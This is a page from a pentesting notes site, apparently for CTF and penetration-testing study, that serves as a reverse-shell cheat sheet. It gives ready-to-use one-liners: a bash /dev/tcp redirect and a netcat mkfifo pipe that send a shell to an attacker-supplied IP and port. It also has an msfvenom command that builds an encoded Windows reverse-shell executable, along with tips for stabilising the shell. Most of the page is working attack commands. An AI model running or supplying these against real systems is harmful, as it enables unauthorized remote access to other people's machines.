π
π
π
π
Shikata Ga Nai
Searchβ¦
π
π
π
π
Shikata Ga Nai
Shikata Ga Nai
General
Gaining Access
Nmap
Reverse Shell
Password Cracking
Other Services
Web
Linux Foothold
Linux Tricks
Privesc
Windows Foothold
Privesc
Binary
Calling Conventions
Debuggers
Examining Binaries
Shellcoding
Bypassing Exploit Mitigation Techniques [Linux]
Stego
Stego tools
Powered By
GitBook
Reverse Shell
One-Liners
Bash
bash
-i
>&
/dev/tcp/
<
IP
>
/
<
port
>
0
>
&1
Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
Sometimes one one-liner won't work, but another will. Two great cheatsheets are
pentestmonkey
and
highoncoffee
.
Generate Payload
Msfvenom
Windows reverse shell with encoder
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe
Shell Cushions
If the reverse shell is terminal-based some measures can be taken to make it more comfortable to use.
Spawn TTY
Python
python -c βimport pty;pty.spawn(β/bin/bashβ)β
β
Additional
ways to spawn TTY.
Auto-Completion
Background the process with Ctrl+z.
Execute this to disable echoing and send I/O straight through without processing.
stty raw -echo
return to the process with fg + Enter x2.
β
Additional cushions
.
β
Gaining Access - Previous
Nmap
Next - Gaining Access
Password Cracking
Last modified
2yr ago
Copy link
On this page
One-Liners
Generate Payload
Msfvenom
Shell Cushions
Spawn TTY
Auto-Completion